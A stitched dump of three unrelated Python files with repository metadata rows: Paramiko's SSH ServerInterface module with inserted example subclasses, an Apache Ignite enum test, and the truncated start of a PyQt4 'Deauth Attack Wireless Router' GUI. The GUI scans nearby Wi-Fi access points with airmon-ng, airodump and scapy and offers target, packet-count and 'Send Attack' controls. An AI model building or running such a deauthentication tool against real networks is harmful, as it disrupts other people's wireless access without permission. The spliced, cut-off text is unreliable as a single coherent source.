# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
"""
`.ServerInterface` is an interface to override for server support.
"""
import threading
from paramiko import util
from paramiko.common import (
DEBUG, ERROR, OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED, AUTH_FAILED,
AUTH_SUCCESSFUL,
)
from paramiko.py3compat import string_types
class ServerInterface (object):
"""
This class defines an interface for controlling the behavior of Paramiko
in server mode.
Methods on this class are called from Paramiko's primary thread, so you
shouldn't do too much work in them. (Certainly nothing that blocks or
sleeps.)
"""
def check_channel_request(self, kind, chanid):
"""
Determine if a channel request of a given type will be granted, and
return ``OPEN_SUCCEEDED`` or an error code. This method is
called in server mode when the client requests a channel, after
authentication is complete.
If you allow channel requests (and an ssh server that didn't would be
useless), you should also override some of the channel request methods
below, which are used to determine which services will be allowed on
a given channel:
- `check_channel_pty_request`
- `check_channel_shell_request`
- `check_channel_subsystem_request`
- `check_channel_window_change_request`
- `check_channel_x11_request`
- `check_channel_forward_agent_request`
The ``chanid`` parameter is a small number that uniquely identifies the
channel within a `.Transport`. A `.Channel` object is not created
unless this method returns ``OPEN_SUCCEEDED`` -- once a
`.Channel` object is created, you can call `.Channel.get_id` to
retrieve the channel ID.
The return value should either be ``OPEN_SUCCEEDED`` (or
``0``) to allow the channel request, or one of the following error
codes to reject it:
- ``OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED``
- ``OPEN_FAILED_CONNECT_FAILED``
- ``OPEN_FAILED_UNKNOWN_CHANNEL_TYPE``
- ``OPEN_FAILED_RESOURCE_SHORTAGE``
The default implementation always returns
``OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED``.
:param str kind:
the kind of channel the client would like to open (usually
``"session"``).
:param int chanid: ID of the channel
:return: an `int` success or failure code (listed above)
"""
return OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
def get_allowed_auths(self, username):
"""
Return a list of authentication methods supported by the server.
This list is sent to clients attempting to authenticate, to inform them
of authentication methods that might be successful.
The "list" is actually a string of comma-separated names of types of
authentication. Possible values are ``"password"``, ``"publickey"``,
and ``"none"``.
The default implementation always returns ``"password"``.
:param str username: the username requesting authentication.
:return: a comma-separated `str` of authentication types
"""
return 'password'
def check_auth_none(self, username):
"""
Determine if a client may open channels with no (further)
authentication.
Return ``AUTH_FAILED`` if the client must authenticate, or
``AUTH_SUCCESSFUL`` if it's okay for the client to not
authenticate.
The default implementation always returns ``AUTH_FAILED``.
:param str username: the username of the client.
:return:
``AUTH_FAILED`` if the authentication fails; ``AUTH_SUCCESSFUL`` if
it succeeds.
:rtype: int
"""
return AUTH_FAILED
def check_auth_password(self, username, password):
"""
Determine if a given username and password supplied by the client is
acceptable for use in authentication.
Return ``AUTH_FAILED`` if the password is not accepted,
``AUTH_SUCCESSFUL`` if the password is accepted and completes
the authentication, or ``AUTH_PARTIALLY_SUCCESSFUL`` if your
authentication is stateful, and this key is accepted for
authentication, but more authentication is required. (In this latter
case, `get_allowed_auths` will be called to report to the client what
options it has for continuing the authentication.)
The default implementation always returns ``AUTH_FAILED``.
:param str username: the username of the authenticating client.
:param str password: the password given by the client.
:return:
``AUTH_FAILED`` if the authentication fails; ``AUTH_SUCCESSFUL`` if
it succeeds; ``AUTH_PARTIALLY_SUCCESSFUL`` if the password auth is
successful, but authentication must continue.
:rtype: int
"""
return AUTH_FAILED
def check_auth_publickey(self, username, key):
"""
Determine if a given key supplied by the client is acceptable for use
in authentication. You should override this method in server mode to
check the username and key and decide if you would accept a signature
made using this key.
Return ``AUTH_FAILED`` if the key is not accepted,
``AUTH_SUCCESSFUL`` if the key is accepted and completes the
authentication, or ``AUTH_PARTIALLY_SUCCESSFUL`` if your
authentication is stateful, and this password is accepted for
authentication, but more authentication is required. (In this latter
case, `get_allowed_auths` will be called to report to the client what
options it has for continuing the authentication.)
        Note that you don't have to actually verify any key signature here.
If you're willing to accept the key, Paramiko will do the work of
verifying the client's signature.
The default implementation always returns ``AUTH_FAILED``.
:param str username: the username of the authenticating client
:param .PKey key: the key object provided by the client
:return:
``AUTH_FAILED`` if the client can't authenticate with this key;
``AUTH_SUCCESSFUL`` if it can; ``AUTH_PARTIALLY_SUCCESSFUL`` if it
can authenticate with this key but must continue with
authentication
:rtype: int
"""
return AUTH_FAILED
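    # Illustrative sketch (not part of the original class): in practice a
    # server subclasses ServerInterface and overrides only the hooks it
    # needs, for example (OPEN_SUCCEEDED would also need to be imported
    # from paramiko.common):
    #
    #     class DemoServer(ServerInterface):
    #         def check_auth_password(self, username, password):
    #             ok = (username, password) == ("demo", "demo")
    #             return AUTH_SUCCESSFUL if ok else AUTH_FAILED
    #
    #         def check_channel_request(self, kind, chanid):
    #             if kind == "session":
    #                 return OPEN_SUCCEEDED
    #             return OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED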
def check_auth_interactive(self, username, submethods):
"""
Begin an interactive authentication challenge, if supported. You
should override this method in server mode if you want to support the
``"keyboard-interactive"`` auth type, which requires you to send a
series of questions for the client to answer.
Return ``AUTH_FAILED`` if this auth method isn't supported. Otherwise,
you should return an `.InteractiveQuery` object containing the prompts
and instructions for the user. The response will be sent via a call
to `check_auth_interactive_response`.
The default implementation always returns ``AUTH_FAILED``.
:param str username: the username of the authenticating client
:param str submethods:
a comma-separated list of methods preferred by the client (usually
empty)
:return:
``AUTH_FAILED`` if this auth method isn't supported; otherwise an
object containing queries for the user
:rtype: int or `.InteractiveQuery`
"""
return AUTH_FAILED
def check_auth_interactive_response(self, responses):
"""
Continue or finish an interactive authentication challenge, if
supported. You should override this method in server mode if you want
to support the ``"keyboard-interactive"`` auth type.
Return ``AUTH_FAILED`` if the responses are not accepted,
``AUTH_SUCCESSFUL`` if the responses are accepted and complete
the authentication, or ``AUTH_PARTIALLY_SUCCESSFUL`` if your
authentication is stateful, and this set of responses is accepted for
authentication, but more authentication is required. (In this latter
case, `get_allowed_auths` will be called to report to the client what
options it has for continuing the authentication.)
If you wish to continue interactive authentication with more questions,
you may return an `.InteractiveQuery` object, which should cause the
client to respond with more answers, calling this method again. This
cycle can continue indefinitely.
The default implementation always returns ``AUTH_FAILED``.
:param responses: list of `str` responses from the client
:return:
``AUTH_FAILED`` if the authentication fails; ``AUTH_SUCCESSFUL`` if
it succeeds; ``AUTH_PARTIALLY_SUCCESSFUL`` if the interactive auth
is successful, but authentication must continue; otherwise an
object containing queries for the user
:rtype: int or `.InteractiveQuery`
"""
return AUTH_FAILED
def check_auth_gssapi_with_mic(self, username,
gss_authenticated=AUTH_FAILED,
cc_file=None):
"""
Authenticate the given user to the server if he is a valid krb5
principal.
:param str username: The username of the authenticating client
:param int gss_authenticated: The result of the krb5 authentication
        :param str cc_file: The krb5 client credentials cache filename
:return: ``AUTH_FAILED`` if the user is not authenticated otherwise
``AUTH_SUCCESSFUL``
:rtype: int
:note: Kerberos credential delegation is not supported.
:see: `.ssh_gss`
        :note: We are just checking in L{AuthHandler} that the given user is
               a valid krb5 principal!
               We don't check if the krb5 principal is allowed to log in on
               the server, because there is no way to do that in python. So
               if you develop your own SSH server with paramiko for a certain
               platform like Linux, you should call C{krb5_kuserok()} in
your local kerberos library to make sure that the
krb5_principal has an account on the server and is allowed to
log in as a user.
:see: http://www.unix.com/man-page/all/3/krb5_kuserok/
"""
if gss_authenticated == AUTH_SUCCESSFUL:
return AUTH_SUCCESSFUL
return AUTH_FAILED
def check_auth_gssapi_keyex(self, username,
gss_authenticated=AUTH_FAILED,
cc_file=None):
"""
Authenticate the given user to the server if he is a valid krb5
principal and GSS-API Key Exchange was performed.
If GSS-API Key Exchange was not performed, this authentication method
won't be available.
:param str username: The username of the authenticating client
:param int gss_authenticated: The result of the krb5 authentication
        :param str cc_file: The krb5 client credentials cache filename
:return: ``AUTH_FAILED`` if the user is not authenticated otherwise
``AUTH_SUCCESSFUL``
:rtype: int
:note: Kerberos credential delegation is not supported.
:see: `.ssh_gss` `.kex_gss`
        :note: We are just checking in L{AuthHandler} that the given user is
               a valid krb5 principal!
               We don't check if the krb5 principal is allowed to log in on
               the server, because there is no way to do that in python. So
               if you develop your own SSH server with paramiko for a certain
               platform like Linux, you should call C{krb5_kuserok()} in
your local kerberos library to make sure that the
krb5_principal has an account on the server and is allowed
to log in as a user.
:see: http://www.unix.com/man-page/all/3/krb5_kuserok/
"""
if gss_authenticated == AUTH_SUCCESSFUL:
return AUTH_SUCCESSFUL
return AUTH_FAILED
def enable_auth_gssapi(self):
"""
Overwrite this function in your SSH server to enable GSSAPI
authentication.
The default implementation always returns false.
:returns bool: Whether GSSAPI authentication is enabled.
:see: `.ssh_gss`
"""
UseGSSAPI = False
return UseGSSAPI
def check_port_forward_request(self, address, port):
"""
Handle a request for port forwarding. The client is asking that
connections to the given address and port be forwarded back across
this ssh connection. An address of ``"0.0.0.0"`` indicates a global
address (any address associated with this server) and a port of ``0``
indicates that no specific port is requested (usually the OS will pick
a port).
The default implementation always returns ``False``, rejecting the
port forwarding request. If the request is accepted, you should return
the port opened for listening.
:param str address: the requested address
:param int port: the requested port
:return:
the port number (`int`) that was opened for listening, or ``False``
to reject
"""
return False
def cancel_port_forward_request(self, address, port):
"""
The client would like to cancel a previous port-forwarding request.
If the given address and port is being forwarded across this ssh
connection, the port should be closed.
:param str address: the forwarded address
:param int port: the forwarded port
"""
pass
def check_global_request(self, kind, msg):
"""
Handle a global request of the given ``kind``. This method is called
in server mode and client mode, whenever the remote host makes a global
request. If there are any arguments to the request, they will be in
``msg``.
There aren't any useful global requests defined, aside from port
forwarding, so usually this type of request is an extension to the
protocol.
If the request was successful and you would like to return contextual
data to the remote host, return a tuple. Items in the tuple will be
sent back with the successful result. (Note that the items in the
tuple can only be strings, ints, longs, or bools.)
The default implementation always returns ``False``, indicating that it
does not support any global requests.
.. note:: Port forwarding requests are handled separately, in
`check_port_forward_request`.
:param str kind: the kind of global request being made.
:param .Message msg: any extra arguments to the request.
:return:
``True`` or a `tuple` of data if the request was granted; ``False``
otherwise.
"""
return False
# ...Channel requests...
def check_channel_pty_request(
self, channel, term, width, height, pixelwidth, pixelheight,
modes):
"""
Determine if a pseudo-terminal of the given dimensions (usually
requested for shell access) can be provided on the given channel.
The default implementation always returns ``False``.
:param .Channel channel: the `.Channel` the pty request arrived on.
:param str term: type of terminal requested (for example, ``"vt100"``).
:param int width: width of screen in characters.
:param int height: height of screen in characters.
:param int pixelwidth:
width of screen in pixels, if known (may be ``0`` if unknown).
:param int pixelheight:
height of screen in pixels, if known (may be ``0`` if unknown).
:return:
``True`` if the pseudo-terminal has been allocated; ``False``
otherwise.
"""
return False
def check_channel_shell_request(self, channel):
"""
Determine if a shell will be provided to the client on the given
channel. If this method returns ``True``, the channel should be
connected to the stdin/stdout of a shell (or something that acts like
a shell).
The default implementation always returns ``False``.
:param .Channel channel: the `.Channel` the request arrived on.
:return:
``True`` if this channel is now hooked up to a shell; ``False`` if
a shell can't or won't be provided.
"""
return False
def check_channel_exec_request(self, channel, command):
"""
Determine if a shell command will be executed for the client. If this
method returns ``True``, the channel should be connected to the stdin,
stdout, and stderr of the shell command.
The default implementation always returns ``False``.
:param .Channel channel: the `.Channel` the request arrived on.
:param str command: the command to execute.
:return:
``True`` if this channel is now hooked up to the stdin, stdout, and
stderr of the executing command; ``False`` if the command will not
be executed.
.. versionadded:: 1.1
"""
return False
def check_channel_subsystem_request(self, channel, name):
"""
Determine if a requested subsystem will be provided to the client on
the given channel. If this method returns ``True``, all future I/O
through this channel will be assumed to be connected to the requested
subsystem. An example of a subsystem is ``sftp``.
The default implementation checks for a subsystem handler assigned via
`.Transport.set_subsystem_handler`.
If one has been set, the handler is invoked and this method returns
``True``. Otherwise it returns ``False``.
.. note:: Because the default implementation uses the `.Transport` to
identify valid subsystems, you probably won't need to override this
method.
:param .Channel channel: the `.Channel` the pty request arrived on.
:param str name: name of the requested subsystem.
:return:
``True`` if this channel is now hooked up to the requested
subsystem; ``False`` if that subsystem can't or won't be provided.
"""
transport = channel.get_transport()
handler_class, larg, kwarg = transport._get_subsystem_handler(name)
if handler_class is None:
return False
handler = handler_class(channel, name, self, *larg, **kwarg)
handler.start()
return True
def check_channel_window_change_request(
self, channel, width, height, pixelwidth, pixelheight):
"""
Determine if the pseudo-terminal on the given channel can be resized.
This only makes sense if a pty was previously allocated on it.
The default implementation always returns ``False``.
:param .Channel channel: the `.Channel` the pty request arrived on.
:param int width: width of screen in characters.
:param int height: height of screen in characters.
:param int pixelwidth:
width of screen in pixels, if known (may be ``0`` if unknown).
:param int pixelheight:
height of screen in pixels, if known (may be ``0`` if unknown).
:return: ``True`` if the terminal was resized; ``False`` if not.
"""
return False
def check_channel_x11_request(
self, channel, single_connection, auth_protocol, auth_cookie,
screen_number):
"""
Determine if the client will be provided with an X11 session. If this
method returns ``True``, X11 applications should be routed through new
SSH channels, using `.Transport.open_x11_channel`.
The default implementation always returns ``False``.
:param .Channel channel: the `.Channel` the X11 request arrived on
:param bool single_connection:
``True`` if only a single X11 channel should be opened, else
``False``.
:param str auth_protocol: the protocol used for X11 authentication
:param str auth_cookie: the cookie used to authenticate to X11
:param int screen_number: the number of the X11 screen to connect to
:return: ``True`` if the X11 session was opened; ``False`` if not
"""
return False
def check_channel_forward_agent_request(self, channel):
"""
        Determine if the client will be provided with a forward-agent session.
        If this method returns ``True``, the server will allow SSH agent
        forwarding.
        The default implementation always returns ``False``.
        :param .Channel channel: the `.Channel` the request arrived on
        :return: ``True`` if agent forwarding was allowed; ``False`` if not
"""
return False
def check_channel_direct_tcpip_request(self, chanid, origin, destination):
"""
Determine if a local port forwarding channel will be granted, and
return ``OPEN_SUCCEEDED`` or an error code. This method is
called in server mode when the client requests a channel, after
authentication is complete.
The ``chanid`` parameter is a small number that uniquely identifies the
channel within a `.Transport`. A `.Channel` object is not created
unless this method returns ``OPEN_SUCCEEDED`` -- once a
`.Channel` object is created, you can call `.Channel.get_id` to
retrieve the channel ID.
The origin and destination parameters are (ip_address, port) tuples
that correspond to both ends of the TCP connection in the forwarding
tunnel.
The return value should either be ``OPEN_SUCCEEDED`` (or
``0``) to allow the channel request, or one of the following error
codes to reject it:
- ``OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED``
- ``OPEN_FAILED_CONNECT_FAILED``
- ``OPEN_FAILED_UNKNOWN_CHANNEL_TYPE``
- ``OPEN_FAILED_RESOURCE_SHORTAGE``
The default implementation always returns
``OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED``.
:param int chanid: ID of the channel
:param tuple origin:
2-tuple containing the IP address and port of the originator
(client side)
:param tuple destination:
2-tuple containing the IP address and port of the destination
(server side)
:return: an `int` success or failure code (listed above)
"""
return OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
def check_channel_env_request(self, channel, name, value):
"""
Check whether a given environment variable can be specified for the
given channel. This method should return ``True`` if the server
is willing to set the specified environment variable. Note that
some environment variables (e.g., PATH) can be exceedingly
dangerous, so blindly allowing the client to set the environment
is almost certainly not a good idea.
The default implementation always returns ``False``.
:param channel: the `.Channel` the env request arrived on
        :param str name: name of the environment variable
        :param str value: value of the environment variable
:returns: A boolean
"""
return False
def get_banner(self):
"""
        A pre-login banner to display to the user. The message may span
        multiple lines separated by CRLF pairs. The language should be in
        RFC 3066 style, for example: en-US.
The default implementation always returns ``(None, None)``.
:returns: A tuple containing the banner and language code.
.. versionadded:: 2.3
"""
return (None, None)
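# Editor's example (not part of paramiko): a minimal sketch of a
# ServerInterface subclass that grants pty, shell and exec requests and only
# allows direct-tcpip forwarding to the loopback address. A real server must
# still perform authentication; this only illustrates the return-value
# contract documented in the methods above.
class _ExampleAllowShellServer (ServerInterface):
    def check_channel_pty_request(
            self, channel, term, width, height, pixelwidth, pixelheight,
            modes):
        # Accept any terminal so interactive clients get a pty.
        return True
    def check_channel_shell_request(self, channel):
        # The application is expected to wire this channel to a shell.
        return True
    def check_channel_exec_request(self, channel, command):
        # Run ``command`` asynchronously and feed its output to ``channel``.
        return True
    def check_channel_direct_tcpip_request(self, chanid, origin, destination):
        # Only allow forwarding to the loopback interface; 0 is equivalent to
        # OPEN_SUCCEEDED per the docstring above.
        if destination[0] == '127.0.0.1':
            return 0
        return OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED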
class InteractiveQuery (object):
"""
A query (set of prompts) for a user during interactive authentication.
"""
def __init__(self, name='', instructions='', *prompts):
"""
Create a new interactive query to send to the client. The name and
instructions are optional, but are generally displayed to the end
user. A list of prompts may be included, or they may be added via
the `add_prompt` method.
:param str name: name of this query
:param str instructions:
user instructions (usually short) about this query
:param str prompts: one or more authentication prompts
"""
self.name = name
self.instructions = instructions
self.prompts = []
for x in prompts:
if isinstance(x, string_types):
self.add_prompt(x)
else:
self.add_prompt(x[0], x[1])
def add_prompt(self, prompt, echo=True):
"""
Add a prompt to this query. The prompt should be a (reasonably short)
string. Multiple prompts can be added to the same query.
:param str prompt: the user prompt
:param bool echo:
``True`` (default) if the user's response should be echoed;
``False`` if not (for a password or similar)
"""
self.prompts.append((prompt, echo))
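# Editor's example (not part of paramiko): building the kind of query
# described above. Prompts can be passed to the constructor or added later;
# ``echo=False`` hides the response, e.g. for passwords.
def _example_interactive_query():
    query = InteractiveQuery('login', 'Please authenticate to continue.')
    query.add_prompt('Username: ')
    query.add_prompt('Password: ', echo=False)
    return query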
class SubsystemHandler (threading.Thread):
"""
    Handler for a subsystem in server mode. If you create a subclass of this
class and pass it to `.Transport.set_subsystem_handler`, an object of this
class will be created for each request for this subsystem. Each new object
will be executed within its own new thread by calling `start_subsystem`.
When that method completes, the channel is closed.
For example, if you made a subclass ``MP3Handler`` and registered it as the
handler for subsystem ``"mp3"``, then whenever a client has successfully
    authenticated and requests subsystem ``"mp3"``, an object of class
``MP3Handler`` will be created, and `start_subsystem` will be called on
it from a new thread.
"""
def __init__(self, channel, name, server):
"""
Create a new handler for a channel. This is used by `.ServerInterface`
to start up a new handler when a channel requests this subsystem. You
don't need to override this method, but if you do, be sure to pass the
``channel`` and ``name`` parameters through to the original
``__init__`` method here.
:param .Channel channel: the channel associated with this
subsystem request.
:param str name: name of the requested subsystem.
:param .ServerInterface server:
the server object for the session that started this subsystem
"""
threading.Thread.__init__(self, target=self._run)
self.__channel = channel
self.__transport = channel.get_transport()
self.__name = name
self.__server = server
def get_server(self):
"""
Return the `.ServerInterface` object associated with this channel and
subsystem.
"""
return self.__server
def _run(self):
try:
self.__transport._log(
DEBUG, 'Starting handler for subsystem {}'.format(self.__name)
)
self.start_subsystem(self.__name, self.__transport, self.__channel)
except Exception as e:
self.__transport._log(
ERROR,
'Exception in subsystem handler for "{}": {}'.format(
self.__name, e
)
)
self.__transport._log(ERROR, util.tb_strings())
try:
self.finish_subsystem()
except:
pass
def start_subsystem(self, name, transport, channel):
"""
Process an ssh subsystem in server mode. This method is called on a
new object (and in a new thread) for each subsystem request. It is
assumed that all subsystem logic will take place here, and when the
subsystem is finished, this method will return. After this method
returns, the channel is closed.
The combination of ``transport`` and ``channel`` are unique; this
handler corresponds to exactly one `.Channel` on one `.Transport`.
.. note::
It is the responsibility of this method to exit if the underlying
`.Transport` is closed. This can be done by checking
`.Transport.is_active` or noticing an EOF on the `.Channel`. If
this method loops forever without checking for this case, your
Python interpreter may refuse to exit because this thread will
still be running.
:param str name: name of the requested subsystem.
:param .Transport transport: the server-mode `.Transport`.
:param .Channel channel: the channel associated with this subsystem
request.
"""
pass
def finish_subsystem(self):
"""
Perform any cleanup at the end of a subsystem. The default
implementation just closes the channel.
.. versionadded:: 1.1
"""
self.__channel.close()
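# Editor's example (not part of paramiko): the "mp3"-style handler mentioned
# in the SubsystemHandler docstring, reduced to an echo loop. It would be
# registered via ``transport.set_subsystem_handler('echo', _ExampleEchoHandler)``
# and instantiated by the transport for each matching subsystem request.
class _ExampleEchoHandler (SubsystemHandler):
    def start_subsystem(self, name, transport, channel):
        # Echo bytes back until the client sends EOF or the transport closes,
        # honouring the note above about exiting when the transport dies.
        while transport.is_active():
            data = channel.recv(1024)
            if not data:
                break
            channel.send(data)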
| e-gob/plataforma-kioscos-autoatencion | scripts/ansible-play/.venv/lib/python2.7/site-packages/paramiko/server.py | Python | bsd-3-clause | 30,482 |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Checks IntEnum enhancement.
"""
from enum import IntEnum
import pytest
from ignitetest.utils.enum import constructible
@constructible
class ConnectType(IntEnum):
"""
Example of IntEnum.
"""
UDP = 0
TCP = 1
HTTP = 2
check_params = []
# pylint: disable=E1101
for name, value in ConnectType.__members__.items():
check_params.append([name, value])
check_params.append([int(value), value])
check_params.append([value, value])
# pylint: disable=no-self-use, no-member
class CheckEnumConstructible:
"""
Basic test of IntEnum decorated with @constructible.
"""
@pytest.mark.parametrize(
['input_value', 'expected_value'],
check_params
)
def check_construct_from(self, input_value, expected_value):
"""Basic checks."""
with ConnectType.construct_from(input_value) as conn_type:
assert conn_type is expected_value
@pytest.mark.parametrize(
['input_value'],
[[val] for val in [-1, .6, 'test']]
)
def check_invalid_input(self, input_value):
"""Check invalid input."""
with pytest.raises(Exception):
ConnectType.construct_from(input_value)
def check_invalid_usage(self):
"""Check invalid type decoration."""
with pytest.raises(AssertionError):
class SimpleClass:
"""Cannot be decorated"""
constructible(SimpleClass)
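# Editor's sketch (not part of the test suite): typical usage of the
# ``construct_from`` helper exercised above -- based only on these checks, it
# accepts a member name, an int value or a member itself and supports the
# ``with`` protocol, yielding the resolved member.
def _example_construct_from_usage():
    with ConnectType.construct_from("TCP") as conn_type:
        assert conn_type is ConnectType.TCP
    with ConnectType.construct_from(2) as conn_type:
        assert conn_type is ConnectType.HTTP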
| ascherbakoff/ignite | modules/ducktests/tests/checks/utils/check_enum_constructible.py | Python | apache-2.0 | 2,219 |
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from subprocess import Popen,PIPE
from scapy.all import *
from Dns_Func import frm_dhcp_Attack
import threading
from os import popen,system,getuid,path,makedirs,getcwd
from re import search,compile,match
from Core.Settings import frm_Settings
from Modules.fuc_airodump import airdump_start,get_network_scan
class frm_window(QMainWindow):
def __init__(self, parent=None):
super(frm_window, self).__init__(parent)
self.form_widget = frm_deauth(self)
self.setCentralWidget(self.form_widget)
        self.setWindowTitle("Deauth Attack Wireless Router")
self.setWindowIcon(QIcon('rsc/icon.png'))
self.config = frm_Settings()
self.loadtheme(self.config.XmlThemeSelected())
def loadtheme(self,theme):
if theme != "theme2":
sshFile=("Core/%s.css"%(theme))
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
else:
sshFile=("Core/%s.css"%(theme))
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
def closeEvent(self, event):
        reply = QMessageBox.question(self, 'About Exit', "Are you sure you want to quit?", QMessageBox.Yes |
QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
if getuid() == 0:
system("airmon-ng stop wlan0mon")
system("clear")
self.deleteLater()
else:
pass
else:
event.ignore()
class frm_deauth(QWidget):
def __init__(self, parent=None):
super(frm_deauth, self).__init__(parent)
self.Main = QVBoxLayout()
self.interface = "wlan0"
self.xmlcheck = frm_Settings()
self.ap_list = []
self.pacote = []
self.control = None
self.data = {'Bssid':[], 'Essid':[], 'Channel':[]}
self.window_qt()
def select_target(self):
item = self.tables.selectedItems()
if item != []:
self.linetarget.setText(item[2].text())
else:
            QMessageBox.critical(self, "Error in row", "No row selected in the table, please scan the network and try again")
self.linetarget.clear()
def window_qt(self):
self.controlador = QLabel("")
self.attack_OFF()
self.form0 = QFormLayout()
self.form1 = QFormLayout()
self.form2 = QFormLayout()
self.list = QListWidget()
self.list.clicked.connect(self.list_clicked)
self.list.setFixedHeight(20)
self.tables = QTableWidget(5,3)
self.tables.setFixedWidth(350)
self.tables.setRowCount(100)
self.tables.setFixedHeight(200)
self.tables.setSelectionBehavior(QAbstractItemView.SelectRows)
self.tables.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.tables.clicked.connect(self.select_target)
self.tables.resizeColumnsToContents()
self.tables.resizeRowsToContents()
self.tables.horizontalHeader().resizeSection(1,120)
self.tables.horizontalHeader().resizeSection(0,60)
self.tables.horizontalHeader().resizeSection(2,158)
self.tables.verticalHeader().setVisible(False)
Headers = []
for n, key in enumerate(self.data.keys()):
Headers.append(key)
self.tables.setHorizontalHeaderLabels(Headers)
self.linetarget = QLineEdit()
self.input_client = QLineEdit(self)
self.input_client.setText("FF:FF:FF:FF:FF:FF")
self.btn_enviar = QPushButton("Send Attack", self)
self.btn_enviar.clicked.connect(self.attack_deauth)
self.btn_scan = QPushButton(" Network Scan ", self)
self.btn_scan.clicked.connect(self.exec_sniff)
self.btn_stop = QPushButton("Stop Attack ", self)
self.btn_stop.clicked.connect(self.kill_thread)
self.btn_enviar.setFixedWidth(170)
self.btn_stop.setFixedWidth(170)
#icons
self.btn_scan.setIcon(QIcon("rsc/network.png"))
self.btn_enviar.setIcon(QIcon("rsc/start.png"))
self.btn_stop.setIcon(QIcon("rsc/Stop.png"))
self.w_pacote = QComboBox(self)
self.w_pacote.addItem("1000 ")
self.w_pacote.addItem("2000 ")
self.w_pacote.addItem("3000 ")
self.w_pacote.addItem("4000 ")
self.w_pacote.addItem("5000 ")
self.w_pacote.addItem("10000 ")
self.w_pacote.addItem("infinite loop")
self.time_scan = QComboBox(self)
self.time_scan.addItem("10s")
self.time_scan.addItem("20s")
self.time_scan.addItem("30s")
self.get_placa = QComboBox(self)
Interfaces = frm_dhcp_Attack()
n = Interfaces.placa()
for i,j in enumerate(n):
if search("wlan", j):
self.get_placa.addItem(n[i])
self.form0.addRow("Network scan time:", self.time_scan)
self.form1.addRow(self.tables)
self.form1.addRow(self.get_placa, self.btn_scan)
self.form1.addRow("Target:", self.linetarget)
self.form1.addRow("Packet:",self.w_pacote)
self.form1.addRow("Client:", self.input_client)
self.form1.addRow("Status Attack:", self.controlador)
self.form2.addRow(self.btn_enviar, self.btn_stop)
self.Main.addLayout(self.form0)
self.Main.addLayout(self.form1)
self.Main.addLayout(self.form2)
self.setLayout(self.Main)
self.logo = QPixmap(getcwd() + "/rsc/peh4.jpg")
self.label_imagem = QLabel()
self.label_imagem.setPixmap(self.logo)
self.form0.addRow(self.label_imagem)
def scan_diveces_airodump(self):
dirpath = "Settings/Dump"
if not path.isdir(dirpath):
makedirs(dirpath)
self.data = {'Bssid':[], 'Essid':[], 'Channel':[]}
exit_air = airdump_start()
self.fix = False
if exit_air == None:
self.cap = get_network_scan()
if self.cap != None:
for i in self.cap:
i = i.split("||")
if self.check_is_mac(i[2]):
Headers = []
self.data['Channel'].append(i[0])
self.data['Essid'].append(i[1])
self.data['Bssid'].append(i[2])
for n, key in enumerate(self.data.keys()):
Headers.append(key)
for m, item in enumerate(self.data[key]):
item = QTableWidgetItem(item)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
self.tables.setItem(m, n, item)
self.cap =[]
def kill_thread(self):
self.attack_OFF()
self.control = 1
dat = self.xmlcheck.xmlSettings("item1","deauth_mdk3",None,False)
if dat == "True":
popen("killall xterm")
def exec_sniff(self):
self.data = {'Bssid':[], 'Essid':[], 'Channel':[]}
dot =1
count = 0
self.options_scan = self.xmlcheck.xmlSettings("monitor0", "scan_scapy", None, False)
if self.get_placa.currentText() == "":
            QMessageBox.information(self, "Network Adapter", 'Network adapter not found, try again.')
else:
comando = "ifconfig"
proc = Popen(comando,stdout=PIPE, shell=False)
data = proc.communicate()[0]
if search("wlan0", data):
dot = 0
c = "airmon-ng stop wlan0mon".split()
Popen(c,stdout=PIPE, shell=False)
system("airmon-ng start %s" %(self.get_placa.currentText()))
else:
system("airmon-ng start %s" %(self.get_placa.currentText()))
if self.time_scan.currentText() == "10s":
count = 10
elif self.time_scan.currentText() == "20s":
count = 20
elif self.time_scan.currentText() == "30s":
count = 30
if self.options_scan == "True":
sniff(iface=self.interface, prn =self.Scanner_devices, timeout=count)
t = len(self.ap_list) -1
i = 0
items = []
cap = []
for i in range(t):
if len(self.ap_list[i]) < len(self.ap_list[i+1]):
if i != 0:
for index in xrange(self.list.count()):
items.append(self.list.item(index))
if self.ap_list[i] or self.ap_list[i+1] in items:
pass
else:
self.list.addItem(self.ap_list[i] + " " + self.ap_list[i+1])
if not (self.ap_list[i] + " " + self.ap_list[i+1]) in cap:
cap.append(self.ap_list[i] + " " + self.ap_list[i+1])
else:
self.list.addItem(self.ap_list[i] + " " + self.ap_list[i+1])
if not (self.ap_list[i] + " " + self.ap_list[i+1]) in cap:
cap.append(self.ap_list[i] + " " + self.ap_list[i+1])
else:
self.list.addItem(self.ap_list[i+1] + " " + self.ap_list[i])
if not (self.ap_list[i+1] + " " + self.ap_list[i]) in cap:
cap.append(self.ap_list[i+1] + " " + self.ap_list[i])
if self.ap_list[i] < i:
pass
break
else:
dot = 1
self.list.clear()
for i in cap:
dat = i.split()
if self.check_is_mac(dat[3]):
self.data['Channel'].append(dat[0])
self.data['Essid'].append(dat[2])
self.data['Bssid'].append(dat[3])
Headers = []
for n, key in enumerate(self.data.keys()):
